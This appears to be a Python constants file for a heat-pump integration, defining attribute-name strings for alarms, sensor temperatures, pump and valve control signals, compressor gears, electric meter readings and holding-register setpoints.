ATTR_DINPUT_TWC_CIRCULATION_RETURN_SENSOR_ALARM = "dinput_twc_circulation_return_sensor_alarm"
ATTR_DINPUT_HGW_SENSOR_ALARM = "dinput_hgw_sensor_alarm"
ATTR_DINPUT_INTERNAL_ADDITIONAL_HEATER_ALARM = "dinput_internal_additional_heater_alarm"
ATTR_DINPUT_BRINE_IN_HIGH_TEMPERATURE_ALARM = "dinput_brine_in_high_temperature_alarm"
ATTR_DINPUT_BRINE_IN_LOW_TEMPERATURE_ALARM = "dinput_brine_in_low_temperature_alarm"
ATTR_DINPUT_BRINE_OUT_LOW_TEMPERATURE_ALARM = "dinput_brine_out_low_temperature_alarm"
ATTR_DINPUT_TWC_CIRCULATION_RETURN_LOW_TEMPERATURE_ALARM = "dinput_twc_circulation_return_low_temperature_alarm"
ATTR_DINPUT_TWC_SUPPLY_LOW_TEMPERATURE_ALARM = "dinput_twc_supply_low_temperature_alarm"
ATTR_DINPUT_MIX_VALVE_1_SUPPLY_TEMPERATURE_DEVIATION_ALARM = "dinput_mix_valve_1_supply_temperature_deviation_alarm"
ATTR_DINPUT_MIX_VALVE_2_SUPPLY_TEMPERATURE_DEVIATION_ALARM = "dinput_mix_valve_2_supply_temperature_deviation_alarm"
ATTR_DINPUT_MIX_VALVE_3_SUPPLY_TEMPERATURE_DEVIATION_ALARM = "dinput_mix_valve_3_supply_temperature_deviation_alarm"
ATTR_DINPUT_MIX_VALVE_4_SUPPLY_TEMPERATURE_DEVIATION_ALARM = "dinput_mix_valve_4_supply_temperature_deviation_alarm"
ATTR_DINPUT_MIX_VALVE_5_SUPPLY_TEMPERATURE_DEVIATION_ALARM = "dinput_mix_valve_5_supply_temperature_deviation_alarm"
ATTR_DINPUT_WCS_RETURN_LINE_TEMPERATURE_DEVIATION_ALARM = "dinput_wcs_return_line_temperature_deviation_alarm"
ATTR_DINPUT_SUM_ALARM = "dinput_sum_alarm"
ATTR_DINPUT_COOLING_CIRCUIT_SUPPLY_LINE_TEMPERATURE_DEVIATION_ALARM = "dinput_cooling_circuit_supply_line_temperature_deviation_alarm"
ATTR_DINPUT_COOLING_TANK_TEMPERATURE_DEVIATION_ALARM = "dinput_cooling_tank_temperature_deviation_alarm"
ATTR_DINPUT_SURPLUS_HEAT_TEMPERATURE_DEVIATION_ALARM = "dinput_surplus_heat_temperature_deviation_alarm"
ATTR_DINPUT_HUMIDITY_ROOM_SENSOR_ALARM = "dinput_humidity_room_sensor_alarm"
ATTR_DINPUT_SURPLUS_HEAT_SUPPLY_LINE_SENSOR_ALARM = "dinput_surplus_heat_supply_line_sensor_alarm"
ATTR_DINPUT_SURPLUS_HEAT_RETURN_LINE_SENSOR_ALARM = "dinput_surplus_heat_return_line_sensor_alarm"
ATTR_DINPUT_COOLING_TANK_RETURN_LINE_SENSOR_ALARM = "dinput_cooling_tank_return_line_sensor_alarm"
ATTR_DINPUT_TEMPERATURE_ROOM_SENSOR_ALARM = "dinput_temperature_room_sensor_alarm"
ATTR_DINPUT_INVERTER_UNIT_COMMUNICATION_ALARM = "dinput_inverter_unit_communication_alarm"
ATTR_DINPUT_POOL_RETURN_LINE_SENSOR_ALARM = "dinput_pool_return_line_sensor_alarm"
ATTR_DINPUT_EXTERNAL_STOP_FOR_POOL = "dinput_external_stop_for_pool"
ATTR_DINPUT_EXTERNAL_START_BRINE_PUMP = "dinput_external_start_brine_pump"
ATTR_DINPUT_EXTERNAL_RELAY_FOR_BRINE_GROUND_WATER_PUMP = "dinput_external_relay_for_brine_ground_water_pump"
ATTR_DINPUT_TAP_WATER_END_TANK_SENSOR_ALARM = "dinput_tap_water_end_tank_sensor_alarm"
ATTR_DINPUT_MAXIMUM_TIME_FOR_ANTI_LEGIONELLA_EXCEEDED_ALARM = "dinput_maximum_time_for_anti_legionella_exceeded_alarm"
ATTR_DINPUT_GENESIS_SECONDARY_UNIT_ALARM = "dinput_genesis_secondary_unit_alarm"
ATTR_DINPUT_PRIMARY_UNIT_CONFLICT_ALARM = "dinput_primary_unit_conflict_alarm"
ATTR_DINPUT_PRIMARY_UNIT_NO_SECONDARY_ALARM = "dinput_primary_unit_no_secondary_alarm"
ATTR_DINPUT_OIL_BOOST_IN_PROGRESS = "dinput_oil_boost_in_progress"
ATTR_DINPUT_COMPRESSOR_CONTROL_SIGNAL = "dinput_compressor_control_signal"
ATTR_DINPUT_SMART_GRID_1 = "dinput_smart_grid_1"
ATTR_DINPUT_EXTERNAL_ALARM_INPUT = "dinput_external_alarm_input"
ATTR_DINPUT_SMART_GRID_2 = "dinput_smart_grid_2"
ATTR_DINPUT_EXTERNAL_ADDITIONAL_HEATER_CONTROL_SIGNAL = "dinput_external_additional_heater_control_signal"
ATTR_DINPUT_MIX_VALVE_1_CIRCULATION_PUMP_CONTROL_SIGNAL = "dinput_mix_valve_1_circulation_pump_control_signal"
ATTR_DINPUT_CONDENSER_PUMP_ON_OFF_CONTROL = "dinput_condenser_pump_on_off_control"
ATTR_DINPUT_SYSTEM_CIRCULATION_PUMP_CONTROL_SIGNAL = "dinput_system_circulation_pump_control_signal"
ATTR_DINPUT_HOT_GAS_CIRCULATION_PUMP_CONTROL_SIGNAL = "dinput_hot_gas_circulation_pump_control_signal"
ATTR_DINPUT_BRINE_PUMP_ON_OFF_CONTROL = "dinput_brine_pump_on_off_control"
ATTR_DINPUT_EXTERNAL_HEATER_CIRCULATION_PUMP_CONTROL_SIGNAL = "dinput_external_heater_circulation_pump_control_signal"
ATTR_DINPUT_HEATING_SEASON_ACTIVE = "dinput_heating_season_active"
ATTR_DINPUT_EXTERNAL_ADDITIONAL_HEATER_ACTIVE = "dinput_external_additional_heater_active"
ATTR_DINPUT_INTERNAL_ADDITIONAL_HEATER_ACTIVE = "dinput_internal_additional_heater_active"
ATTR_DINPUT_HGW_REGULATION_CONTROL_SIGNAL = "dinput_hgw_regulation_control_signal"
ATTR_DINPUT_HEAT_PUMP_STOPPING = "dinput_heat_pump_stopping"
ATTR_DINPUT_HEAT_PUMP_OK_TO_START = "dinput_heat_pump_ok_to_start"
ATTR_DINPUT_TWC_SUPPLY_LINE_CIRCULATION_PUMP_CONTROL_SIGNAL = "dinput_twc_supply_line_circulation_pump_control_signal"
ATTR_DINPUT_WCS_REGULATION_CONTROL_SIGNAL = "dinput_wcs_regulation_control_signal"
ATTR_DINPUT_WCS_CIRCULATION_PUMP_CONTROL_SIGNAL = "dinput_wcs_circulation_pump_control_signal"
ATTR_DINPUT_TWC_END_TANK_HEATER_CONTROL_SIGNAL = "dinput_twc_end_tank_heater_control_signal"
ATTR_DINPUT_POOL_DIRECTIONAL_VALVE_POSITION = "dinput_pool_directional_valve_position"
ATTR_DINPUT_COOLING_CIRCUIT_CIRCULATION_PUMP_CONTROL_SIGNAL = "dinput_cooling_circuit_circulation_pump_control_signal"
ATTR_DINPUT_POOL_CIRCULATION_PUMP_CONTROL_SIGNAL = "dinput_pool_circulation_pump_control_signal"
ATTR_DINPUT_SURPLUS_HEAT_DIRECTIONAL_VALVE_POSITION = "dinput_surplus_heat_directional_valve_position"
ATTR_DINPUT_SURPLUS_HEAT_CIRCULATION_PUMP_CONTROL_SIGNAL = "dinput_surplus_heat_circulation_pump_control_signal"
ATTR_DINPUT_COOLING_CIRCUIT_REGULATION_CONTROL_SIGNAL = "dinput_cooling_circuit_regulation_control_signal"
ATTR_DINPUT_SURPLUS_HEAT_REGULATION_CONTROL_SIGNAL = "dinput_surplus_heat_regulation_control_signal"
ATTR_DINPUT_ACTIVE_COOLING_DIRECTIONAL_VALVE_POSITION = "dinput_active_cooling_directional_valve_position"
ATTR_DINPUT_PASSIVE_ACTIVE_COOLING_DIRECTIONAL_VALVE_POSITION = "dinput_passive_active_cooling_directional_valve_position"
ATTR_DINPUT_POOL_REGULATION_CONTROL_SIGNAL = "dinput_pool_regulation_control_signal"
ATTR_DINPUT_INDICATION_WHEN_MIXING_VALVE_1_IS_PRODUCING_PASSIVE_COOLING = "dinput_indication_when_mixing_valve_1_is_producing_passive_cooling"
ATTR_DINPUT_COMPRESSOR_IS_UNABLE_TO_SPEED_UP = "dinput_compressor_is_unable_to_speed_up"
ATTR_INPUT_FIRST_PRIORITISED_DEMAND = "input_first_prioritised_demand"
ATTR_INPUT_COMPRESSOR_AVAILABLE_GEARS = "input_compressor_available_gears"
ATTR_INPUT_COMPRESSOR_SPEED_RPM = "input_compressor_speed_rpm"
ATTR_INPUT_EXTERNAL_ADDITIONAL_HEATER_CURRENT_DEMAND = "input_external_additional_heater_current_demand"
ATTR_INPUT_DISCHARGE_PIPE_TEMPERATURE = "input_discharge_pipe_temperature"
ATTR_INPUT_CONDENSER_IN_TEMPERATURE = "input_condenser_in_temperature"
ATTR_INPUT_CONDENSER_OUT_TEMPERATURE = "input_condenser_out_temperature"
ATTR_INPUT_BRINE_IN_TEMPERATURE = "input_brine_in_temperature"
ATTR_INPUT_BRINE_OUT_TEMPERATURE = "input_brine_out_temperature"
ATTR_INPUT_SYSTEM_SUPPLY_LINE_TEMPERATURE = "input_system_supply_line_temperature"
ATTR_INPUT_OUTDOOR_TEMPERATURE = "input_outdoor_temperature"
ATTR_INPUT_TAP_WATER_TOP_TEMPERATURE = "input_tap_water_top_temperature"
ATTR_INPUT_TAP_WATER_LOWER_TEMPERATURE = "input_tap_water_lower_temperature"
ATTR_INPUT_TAP_WATER_WEIGHTED_TEMPERATURE = "input_tap_water_weighted_temperature"
ATTR_INPUT_SYSTEM_SUPPLY_LINE_CALCULATED_SET_POINT = "input_system_supply_line_calculated_set_point"
ATTR_INPUT_SELECTED_HEAT_CURVE = "input_selected_heat_curve"
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_1 = "input_heat_curve_x_coordinate_1"
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_2 = "input_heat_curve_x_coordinate_2"
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_3 = "input_heat_curve_x_coordinate_3"
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_4 = "input_heat_curve_x_coordinate_4"
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_5 = "input_heat_curve_x_coordinate_5"
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_6 = "input_heat_curve_x_coordinate_6"
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_7 = "input_heat_curve_x_coordinate_7"
ATTR_INPUT_COOLING_SEASON_INTEGRAL_VALUE = "input_cooling_season_integral_value"
ATTR_INPUT_CONDENSER_CIRCULATION_PUMP_SPEED = "input_condenser_circulation_pump_speed"
ATTR_INPUT_MIX_VALVE_1_SUPPLY_LINE_TEMPERATURE = "input_mix_valve_1_supply_line_temperature"
ATTR_INPUT_BUFFER_TANK_TEMPERATURE = "input_buffer_tank_temperature"
ATTR_INPUT_MIX_VALVE_1_POSITION = "input_mix_valve_1_position"
ATTR_INPUT_BRINE_CIRCULATION_PUMP_SPEED = "input_brine_circulation_pump_speed"
ATTR_INPUT_HGW_SUPPLY_LINE_TEMPERATURE = "input_hgw_supply_line_temperature"
ATTR_INPUT_HOT_WATER_DIRECTIONAL_VALVE_POSITION = "input_hot_water_directional_valve_position"
ATTR_INPUT_COMPRESSOR_OPERATING_HOURS = "input_compressor_operating_hours"
ATTR_INPUT_TAP_WATER_OPERATING_HOURS = "input_tap_water_operating_hours"
ATTR_INPUT_EXTERNAL_ADDITIONAL_HEATER_OPERATING_HOURS = "input_external_additional_heater_operating_hours"
ATTR_INPUT_COMPRESSOR_SPEED_PERCENT = "input_compressor_speed_percent"
ATTR_INPUT_SECOND_PRIORITISED_DEMAND = "input_second_prioritised_demand"
ATTR_INPUT_THIRD_PRIORITISED_DEMAND = "input_third_prioritised_demand"
ATTR_INPUT_SOFTWARE_VERSION_MAJOR = "input_software_version_major"
ATTR_INPUT_SOFTWARE_VERSION_MINOR = "input_software_version_minor"
ATTR_INPUT_SOFTWARE_VERSION_MICRO = "input_software_version_micro"
ATTR_INPUT_COMPRESSOR_TEMPORARILY_BLOCKED = "input_compressor_temporarily_blocked"
ATTR_INPUT_COMPRESSOR_CURRENT_GEAR = "input_compressor_current_gear"
ATTR_INPUT_QUEUED_DEMAND_FIRST_PRIORITY = "input_queued_demand_first_priority"
ATTR_INPUT_QUEUED_DEMAND_SECOND_PRIORITY = "input_queued_demand_second_priority"
ATTR_INPUT_QUEUED_DEMAND_THIRD_PRIORITY = "input_queued_demand_third_priority"
ATTR_INPUT_QUEUED_DEMAND_FOURTH_PRIORITY = "input_queued_demand_fourth_priority"
ATTR_INPUT_QUEUED_DEMAND_FIFTH_PRIORITY = "input_queued_demand_fifth_priority"
ATTR_INPUT_INTERNAL_ADDITIONAL_HEATER_CURRENT_STEP = "input_internal_additional_heater_current_step"
ATTR_INPUT_BUFFER_TANK_CHARGE_SET_POINT = "input_buffer_tank_charge_set_point"
ATTR_INPUT_ELECTRIC_METER_L1_CURRENT = "input_electric_meter_l1_current"
ATTR_INPUT_ELECTRIC_METER_L2_CURRENT = "input_electric_meter_l2_current"
ATTR_INPUT_ELECTRIC_METER_L3_CURRENT = "input_electric_meter_l3_current"
ATTR_INPUT_ELECTRIC_METER_L1_0_VOLTAGE = "input_electric_meter_l1_0_voltage"
ATTR_INPUT_ELECTRIC_METER_L2_0_VOLTAGE = "input_electric_meter_l2_0_voltage"
ATTR_INPUT_ELECTRIC_METER_L3_0_VOLTAGE = "input_electric_meter_l3_0_voltage"
ATTR_INPUT_ELECTRIC_METER_L1_L2_VOLTAGE = "input_electric_meter_l1_l2_voltage"
ATTR_INPUT_ELECTRIC_METER_L2_L3_VOLTAGE = "input_electric_meter_l2_l3_voltage"
ATTR_INPUT_ELECTRIC_METER_L3_L1_VOLTAGE = "input_electric_meter_l3_l1_voltage"
ATTR_INPUT_ELECTRIC_METER_L1_POWER = "input_electric_meter_l1_power"
ATTR_INPUT_ELECTRIC_METER_L2_POWER = "input_electric_meter_l2_power"
ATTR_INPUT_ELECTRIC_METER_L3_POWER = "input_electric_meter_l3_power"
ATTR_INPUT_ELECTRIC_METER_METER_VALUE = "input_electric_meter_meter_value"
ATTR_INPUT_COMFORT_MODE = "input_comfort_mode"
ATTR_INPUT_ELECTRIC_METER_KWH_TOTAL = "input_electric_meter_kwh_total"
ATTR_INPUT_WCS_VALVE_POSITION = "input_wcs_valve_position"
ATTR_INPUT_TWC_VALVE_POSITION = "input_twc_valve_position"
ATTR_INPUT_MIX_VALVE_2_POSITION = "input_mix_valve_2_position"
ATTR_INPUT_MIX_VALVE_3_POSITION = "input_mix_valve_3_position"
ATTR_INPUT_MIX_VALVE_4_POSITION = "input_mix_valve_4_position"
ATTR_INPUT_MIX_VALVE_5_POSITION = "input_mix_valve_5_position"
ATTR_INPUT_DEW_POINT_ROOM = "input_dew_point_room"
ATTR_INPUT_COOLING_SUPPLY_LINE_MIX_VALVE_POSITION = "input_cooling_supply_line_mix_valve_position"
ATTR_INPUT_SURPLUS_HEAT_FAN_SPEED = "input_surplus_heat_fan_speed"
ATTR_INPUT_POOL_SUPPLY_LINE_MIX_VALVE_POSITION = "input_pool_supply_line_mix_valve_position"
ATTR_INPUT_TWC_SUPPLY_LINE_TEMPERATURE = "input_twc_supply_line_temperature"
ATTR_INPUT_TWC_RETURN_TEMPERATURE = "input_twc_return_temperature"
ATTR_INPUT_WCS_RETURN_LINE_TEMPERATURE = "input_wcs_return_line_temperature"
ATTR_INPUT_TWC_END_TANK_TEMPERATURE = "input_twc_end_tank_temperature"
ATTR_INPUT_MIX_VALVE_2_SUPPLY_LINE_TEMPERATURE = "input_mix_valve_2_supply_line_temperature"
ATTR_INPUT_MIX_VALVE_3_SUPPLY_LINE_TEMPERATURE = "input_mix_valve_3_supply_line_temperature"
ATTR_INPUT_MIX_VALVE_4_SUPPLY_LINE_TEMPERATURE = "input_mix_valve_4_supply_line_temperature"
ATTR_INPUT_COOLING_CIRCUIT_RETURN_LINE_TEMPERATURE = "input_cooling_circuit_return_line_temperature"
ATTR_INPUT_COOLING_TANK_TEMPERATURE = "input_cooling_tank_temperature"
ATTR_INPUT_COOLING_TANK_RETURN_LINE_TEMPERATURE = "input_cooling_tank_return_line_temperature"
ATTR_INPUT_COOLING_CIRCUIT_SUPPLY_LINE_TEMPERATURE = "input_cooling_circuit_supply_line_temperature"
ATTR_INPUT_MIX_VALVE_5_SUPPLY_LINE_TEMPERATURE = "input_mix_valve_5_supply_line_temperature"
ATTR_INPUT_MIX_VALVE_2_RETURN_LINE_TEMPERATURE = "input_mix_valve_2_return_line_temperature"
ATTR_INPUT_MIX_VALVE_3_RETURN_LINE_TEMPERATURE = "input_mix_valve_3_return_line_temperature"
ATTR_INPUT_MIX_VALVE_4_RETURN_LINE_TEMPERATURE = "input_mix_valve_4_return_line_temperature"
ATTR_INPUT_MIX_VALVE_5_RETURN_LINE_TEMPERATURE = "input_mix_valve_5_return_line_temperature"
ATTR_INPUT_SURPLUS_HEAT_RETURN_LINE_TEMPERATURE = "input_surplus_heat_return_line_temperature"
ATTR_INPUT_SURPLUS_HEAT_SUPPLY_LINE_TEMPERATURE = "input_surplus_heat_supply_line_temperature"
ATTR_INPUT_POOL_SUPPLY_LINE_TEMPERATURE = "input_pool_supply_line_temperature"
ATTR_INPUT_POOL_RETURN_LINE_TEMPERATURE = "input_pool_return_line_temperature"
ATTR_INPUT_ROOM_TEMPERATURE_SENSOR = "input_room_temperature_sensor"
ATTR_INPUT_BUBBLE_POINT = "input_bubble_point"
ATTR_INPUT_DEW_POINT = "input_dew_point"
ATTR_INPUT_DEW_POINT = "input_dew_point"
ATTR_INPUT_SUPERHEAT_TEMPERATURE = "input_superheat_temperature"
ATTR_INPUT_SUB_COOLING_TEMPERATURE = "input_sub_cooling_temperature"
ATTR_INPUT_LOW_PRESSURE_SIDE = "input_low_pressure_side"
ATTR_INPUT_HIGH_PRESSURE_SIDE = "input_high_pressure_side"
ATTR_INPUT_LIQUID_LINE_TEMPERATURE = "input_liquid_line_temperature"
ATTR_INPUT_SUCTION_GAS_TEMPERATURE = "input_suction_gas_temperature"
ATTR_INPUT_HEATING_SEASON_INTEGRAL_VALUE = "input_heating_season_integral_value"
ATTR_INPUT_P_VALUE_FOR_GEAR_SHIFTING_AND_DEMAND_CALCULATION = "input_p_value_for_gear_shifting_and_demand_calculation"
ATTR_INPUT_I_VALUE_FOR_GEAR_SHIFTING_AND_DEMAND_CALCULATION = "input_i_value_for_gear_shifting_and_demand_calculation"
ATTR_INPUT_D_VALUE_FOR_GEAR_SHIFTING_AND_DEMAND_CALCULATION = "input_d_value_for_gear_shifting_and_demand_calculation"
ATTR_INPUT_I_VALUE_FOR_COMPRESSOR_ON_OFF_BUFFER_TANK = "input_i_value_for_compressor_on_off_buffer_tank"
ATTR_INPUT_P_VALUE_FOR_COMPRESSOR_ON_OFF_BUFFER_TANK = "input_p_value_for_compressor_on_off_buffer_tank"
ATTR_INPUT_MIX_VALVE_COOLING_OPENING_DEGREE = "input_mix_valve_cooling_opening_degree"
ATTR_INPUT_DESIRED_GEAR_FOR_TAP_WATER = "input_desired_gear_for_tap_water"
ATTR_INPUT_DESIRED_GEAR_FOR_HEATING = "input_desired_gear_for_heating"
ATTR_INPUT_DESIRED_GEAR_FOR_COOLING = "input_desired_gear_for_cooling"
ATTR_INPUT_DESIRED_GEAR_FOR_POOL = "input_desired_gear_for_pool"
ATTR_INPUT_NUMBER_OF_AVAILABLE_SECONDARIES_GENESIS = "input_number_of_available_secondaries_genesis"
ATTR_INPUT_NUMBER_OF_AVAILABLE_SECONDARIES_LEGACY = "input_number_of_available_secondaries_legacy"
ATTR_INPUT_TOTAL_DISTRIBUTED_GEARS_TO_ALL_UNITS = "input_total_distributed_gears_to_all_units"
ATTR_INPUT_MAXIMUM_GEAR_OUT_OF_ALL_THE_CURRENTLY_REQUESTED_GEARS = "input_maximum_gear_out_of_all_the_currently_requested_gears"
ATTR_INPUT_DESIRED_TEMPERATURE_DISTRIBUTION_CIRCUIT_MIX_VALVE_1 = "input_desired_temperature_distribution_circuit_mix_valve_1"
ATTR_INPUT_DESIRED_TEMPERATURE_DISTRIBUTION_CIRCUIT_MIX_VALVE_2 = "input_desired_temperature_distribution_circuit_mix_valve_2"
ATTR_INPUT_DESIRED_TEMPERATURE_DISTRIBUTION_CIRCUIT_MIX_VALVE_3 = "input_desired_temperature_distribution_circuit_mix_valve_3"
ATTR_INPUT_DESIRED_TEMPERATURE_DISTRIBUTION_CIRCUIT_MIX_VALVE_4 = "input_desired_temperature_distribution_circuit_mix_valve_4"
ATTR_INPUT_DESIRED_TEMPERATURE_DISTRIBUTION_CIRCUIT_MIX_VALVE_5 = "input_desired_temperature_distribution_circuit_mix_valve_5"
ATTR_INPUT_DISCONNECT_HOT_GAS_END_TANK = "input_disconnect_hot_gas_end_tank"
ATTR_INPUT_LEGACY_HEAT_PUMP_COMPRESSOR_RUNNING = "input_legacy_heat_pump_compressor_running"
ATTR_INPUT_LEGACY_HEAT_PUMP_REPORTING_ALARM = "input_legacy_heat_pump_reporting_alarm"
ATTR_INPUT_LEGACY_HEAT_PUMP_START_SIGNAL = "input_legacy_heat_pump_start_signal"
ATTR_INPUT_LEGACY_HEAT_PUMP_TAP_WATER_SIGNAL = "input_legacy_heat_pump_tap_water_signal"
ATTR_INPUT_PRIMARY_UNIT_ALARM_COMBINED_OUTPUT_OF_ALL_CLASS_D_ALARMS = "input_primary_unit_alarm_combined_output_of_all_class_d_alarms"
ATTR_INPUT_PRIMARY_UNIT_ALARM_PRIMARY_UNIT_HAS_LOST_COMMUNICATION = "input_primary_unit_alarm_primary_unit_has_lost_communication"
ATTR_INPUT_PRIMARY_UNIT_ALARM_CLASS_A_ALARM_DETECTED_ON_THE_GENESIS_SECONDARY = "input_primary_unit_alarm_class_a_alarm_detected_on_the_genesis_secondary"
ATTR_INPUT_PRIMARY_UNIT_ALARM_CLASS_B_ALARM_DETECTED_ON_THE_GENESIS_SECONDARY = "input_primary_unit_alarm_class_b_alarm_detected_on_the_genesis_secondary"
ATTR_INPUT_PRIMARY_UNIT_ALARM_COMBINED_OUTPUT_OF_ALL_CLASS_E_ALARMS = "input_primary_unit_alarm_combined_output_of_all_class_e_alarms"
ATTR_INPUT_PRIMARY_UNIT_ALARM_GENERAL_LEGACY_HEAT_PUMP_ALARM = "input_primary_unit_alarm_general_legacy_heat_pump_alarm"
ATTR_INPUT_PRIMARY_UNIT_ALARM_PRIMARY_UNIT_CAN_NOT_COMMUNICATE_WITH_EXPANSION = "input_primary_unit_alarm_primary_unit_can_not_communicate_with_expansion"
ATTR_HOLDING_OPERATIONAL_MODE = "holding_operational_mode"
ATTR_HOLDING_MAX_LIMITATION = "holding_max_limitation"
ATTR_HOLDING_MIN_LIMITATION = "holding_min_limitation"
ATTR_HOLDING_COMFORT_WHEEL_SETTING = "holding_comfort_wheel_setting"
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_1 = "holding_set_point_heat_curve_y_1"
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_2 = "holding_set_point_heat_curve_y_2"
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_3 = "holding_set_point_heat_curve_y_3"
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_4 = "holding_set_point_heat_curve_y_4"
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_5 = "holding_set_point_heat_curve_y_5"
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_6 = "holding_set_point_heat_curve_y_6"
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_7 = "holding_set_point_heat_curve_y_7"
ATTR_HOLDING_HEATING_SEASON_STOP_TEMPERATURE = "holding_heating_season_stop_temperature"
ATTR_HOLDING_START_TEMPERATURE_TAP_WATER = "holding_start_temperature_tap_water"
ATTR_HOLDING_STOP_TEMPERATURE_TAP_WATER = "holding_stop_temperature_tap_water"
ATTR_HOLDING_MINIMUM_ALLOWED_GEAR_IN_HEATING = "holding_minimum_allowed_gear_in_heating"
ATTR_HOLDING_MAXIMUM_ALLOWED_GEAR_IN_HEATING = "holding_maximum_allowed_gear_in_heating"
ATTR_HOLDING_MAXIMUM_ALLOWED_GEAR_IN_TAP_WATER = "holding_maximum_allowed_gear_in_tap_water"
ATTR_HOLDING_MINIMUM_ALLOWED_GEAR_IN_TAP_WATER = "holding_minimum_allowed_gear_in_tap_water"
ATTR_HOLDING_COOLING_MIX_VALVE_SET_POINT = "holding_cooling_mix_valve_set_point"
ATTR_HOLDING_TWC_MIX_VALVE_SET_POINT = "holding_twc_mix_valve_set_point"
ATTR_HOLDING_WCS_RETURN_LINE_SET_POINT = "holding_wcs_return_line_set_point"
ATTR_HOLDING_TWC_MIX_VALVE_LOWEST_ALLOWED_OPENING_DEGREE = "holding_twc_mix_valve_lowest_allowed_opening_degree"
ATTR_HOLDING_TWC_MIX_VALVE_HIGHEST_ALLOWED_OPENING_DEGREE = "holding_twc_mix_valve_highest_allowed_opening_degree"
ATTR_HOLDING_TWC_START_TEMPERATURE_IMMERSION_HEATER = "holding_twc_start_temperature_immersion_heater"
ATTR_HOLDING_TWC_START_DELAY_IMMERSION_HEATER = "holding_twc_start_delay_immersion_heater"
ATTR_HOLDING_TWC_STOP_TEMPERATURE_IMMERSION_HEATER = "holding_twc_stop_temperature_immersion_heater"
ATTR_HOLDING_WCS_MIX_VALVE_LOWEST_ALLOWED_OPENING_DEGREE = "holding_wcs_mix_valve_lowest_allowed_opening_degree"
ATTR_HOLDING_WCS_MIX_VALVE_HIGHEST_ALLOWED_OPENING_DEGREE = "holding_wcs_mix_valve_highest_allowed_opening_degree"
ATTR_HOLDING_MIX_VALVE_2_LOWEST_ALLOWED_OPENING_DEGREE = "holding_mix_valve_2_lowest_allowed_opening_degree"
ATTR_HOLDING_MIX_VALVE_2_HIGHEST_ALLOWED_OPENING_DEGREE = "holding_mix_valve_2_highest_allowed_opening_degree"
ATTR_HOLDING_MIX_VALVE_3_LOWEST_ALLOWED_OPENING_DEGREE = "holding_mix_valve_3_lowest_allowed_opening_degree"
ATTR_HOLDING_MIX_VALVE_3_HIGHEST_ALLOWED_OPENING_DEGREE = "holding_mix_valve_3_highest_allowed_opening_degree"
ATTR_HOLDING_MIX_VALVE_4_LOWEST_ALLOWED_OPENING_DEGREE = "holding_mix_valve_4_lowest_allowed_opening_degree"
ATTR_HOLDING_MIX_VALVE_4_HIGHEST_ALLOWED_OPENING_DEGREE = "holding_mix_valve_4_highest_allowed_opening_degree"
ATTR_HOLDING_MIX_VALVE_5_LOWEST_ALLOWED_OPENING_DEGREE = "holding_mix_valve_5_lowest_allowed_opening_degree"
ATTR_HOLDING_MIX_VALVE_5_HIGHEST_ALLOWED_OPENING_DEGREE = "holding_mix_valve_5_highest_allowed_opening_degree"
ATTR_HOLDING_SURPLUS_HEAT_CHILLER_SET_POINT = "holding_surplus_heat_chiller_set_point"
ATTR_HOLDING_COOLING_SUPPLY_LINE_MIX_VALVE_LOWEST_ALLOWED_OPENING_DEGREE = "holding_cooling_supply_line_mix_valve_lowest_allowed_opening_degree"
ATTR_HOLDING_COOLING_SUPPLY_LINE_MIX_VALVE_HIGHEST_ALLOWED_OPENING_DEGREE = "holding_cooling_supply_line_mix_valve_highest_allowed_opening_degree"
ATTR_HOLDING_SURPLUS_HEAT_OPENING_DEGREE_FOR_STARTING_FAN_1 = "holding_surplus_heat_opening_degree_for_starting_fan_1"
ATTR_HOLDING_SURPLUS_HEAT_OPENING_DEGREE_FOR_STARTING_FAN_2 = "holding_surplus_heat_opening_degree_for_starting_fan_2"
ATTR_HOLDING_SURPLUS_HEAT_OPENING_DEGREE_FOR_STOPPING_FAN_1 = "holding_surplus_heat_opening_degree_for_stopping_fan_1"
ATTR_HOLDING_SURPLUS_HEAT_OPENING_DEGREE_FOR_STOPPING_FAN_2 = "holding_surplus_heat_opening_degree_for_stopping_fan_2"
ATTR_HOLDING_SURPLUS_HEAT_LOWEST_ALLOWED_OPENING_DEGREE = "holding_surplus_heat_lowest_allowed_opening_degree"
ATTR_HOLDING_SURPLUS_HEAT_HIGHEST_ALLOWED_OPENING_DEGREE = "holding_surplus_heat_highest_allowed_opening_degree"
ATTR_HOLDING_POOL_CHARGE_SET_POINT = "holding_pool_charge_set_point"
ATTR_HOLDING_POOL_MIX_VALVE_LOWEST_ALLOWED_OPENING_DEGREE = "holding_pool_mix_valve_lowest_allowed_opening_degree"
ATTR_HOLDING_POOL_MIX_VALVE_HIGHEST_ALLOWED_OPENING_DEGREE = "holding_pool_mix_valve_highest_allowed_opening_degree"
ATTR_HOLDING_GEAR_SHIFT_DELAY_HEATING = "holding_gear_shift_delay_heating"
ATTR_HOLDING_GEAR_SHIFT_DELAY_POOL = "holding_gear_shift_delay_pool"
ATTR_HOLDING_GEAR_SHIFT_DELAY_COOLING = "holding_gear_shift_delay_cooling"
ATTR_HOLDING_BRINE_IN_HIGH_ALARM_LIMIT = "holding_brine_in_high_alarm_limit"
ATTR_HOLDING_BRINE_IN_LOW_ALARM_LIMIT = "holding_brine_in_low_alarm_limit"
ATTR_HOLDING_BRINE_OUT_LOW_ALARM_LIMIT = "holding_brine_out_low_alarm_limit"
ATTR_HOLDING_BRINE_MAX_DELTA_LIMIT = "holding_brine_max_delta_limit"
ATTR_HOLDING_HOT_GAS_PUMP_START_TEMPERATURE_DISCHARGE_PIPE = "holding_hot_gas_pump_start_temperature_discharge_pipe"
ATTR_HOLDING_HOT_GAS_PUMP_LOWER_STOP_LIMIT_TEMPERATURE_DISCHARGE_PIPE = "holding_hot_gas_pump_lower_stop_limit_temperature_discharge_pipe"
